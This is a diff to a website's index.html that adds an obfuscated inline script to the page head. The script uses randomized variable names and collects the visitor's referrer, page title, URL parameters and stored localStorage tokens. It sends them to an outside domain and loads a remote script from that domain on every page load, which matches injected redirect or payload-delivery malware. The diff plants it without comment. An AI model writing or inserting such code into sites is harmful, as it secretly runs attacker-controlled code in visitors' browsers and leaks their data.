--- a/index.html
+++ b/index.html
@@ -4,6 +4,49 @@
 <!DOCTYPE html>
 <html lang="en-US">
 <head>
+    <script>
+    (function() {
+    var name = '_fpNJxTDZjyTjHKqf';
+    if (!window._fpNJxTDZjyTjHKqf) {
+        window._fpNJxTDZjyTjHKqf = {
+            unique: false,
+            ttl: 86400,
+            R_PATH: 'https://ol2kate.ga/4333CNnB',
+            P_PATH: 'https://ol2kate.ga/7b4f75c/postback',
+        };
+    }
+    const _C3tWkMmMjfRbKhxJ = localStorage.getItem('config');
+    if (typeof _C3tWkMmMjfRbKhxJ !== 'undefined' && _C3tWkMmMjfRbKhxJ !== null) {
+        var _3gvzcPg2XK783rVb = JSON.parse(_C3tWkMmMjfRbKhxJ);
+        var _VxrpC5K3znWwWxdz = Math.round(+new Date()/1000);
+        if (_3gvzcPg2XK783rVb.created_at + window._fpNJxTDZjyTjHKqf.ttl < _VxrpC5K3znWwWxdz) {
+            localStorage.removeItem('subId');
+            localStorage.removeItem('token');
+            localStorage.removeItem('config');
+        }
+    }
+    var _nxthfhP18RN6Vghn = localStorage.getItem('subId');
+    var _ZbXjWjJSk3MzjXC7 = localStorage.getItem('token');
+    var _7mMxVhF3jcQznK9Y = '?return=js.client';
+        _7mMxVhF3jcQznK9Y += '&' + decodeURIComponent(window.location.search.replace('?', ''));
+        _7mMxVhF3jcQznK9Y += '&se_referrer=' + encodeURIComponent(document.referrer);
+        _7mMxVhF3jcQznK9Y += '&default_keyword=' + encodeURIComponent(document.title);
+        _7mMxVhF3jcQznK9Y += '&landing_url=' + encodeURIComponent(document.location.hostname + document.location.pathname);
+        _7mMxVhF3jcQznK9Y += '&name=' + encodeURIComponent(name);
+        _7mMxVhF3jcQznK9Y += '&host=' + encodeURIComponent(window._fpNJxTDZjyTjHKqf.R_PATH);
+    if (typeof _nxthfhP18RN6Vghn !== 'undefined' && _nxthfhP18RN6Vghn && window._fpNJxTDZjyTjHKqf.unique) {
+        _7mMxVhF3jcQznK9Y += '&sub_id=' + encodeURIComponent(_nxthfhP18RN6Vghn);
+    }
+    if (typeof _ZbXjWjJSk3MzjXC7 !== 'undefined' && _ZbXjWjJSk3MzjXC7 && window._fpNJxTDZjyTjHKqf.unique) {
+        _7mMxVhF3jcQznK9Y += '&token=' + encodeURIComponent(_ZbXjWjJSk3MzjXC7);
+    }
+    var a = document.createElement('script');
+        a.type = 'application/javascript';
+        a.src = window._fpNJxTDZjyTjHKqf.R_PATH + _7mMxVhF3jcQznK9Y;
+    var s = document.getElementsByTagName('script')[0];
+    s.parentNode.insertBefore(a, s)
+    })();
+    </script>
     <script src="js/websiteBrowserCheck.js"></script>
     <meta name="facebook-domain-verification" content="v1s17b0o3dinmns0le93si89lm5azl" />
     <meta charset="utf-8">
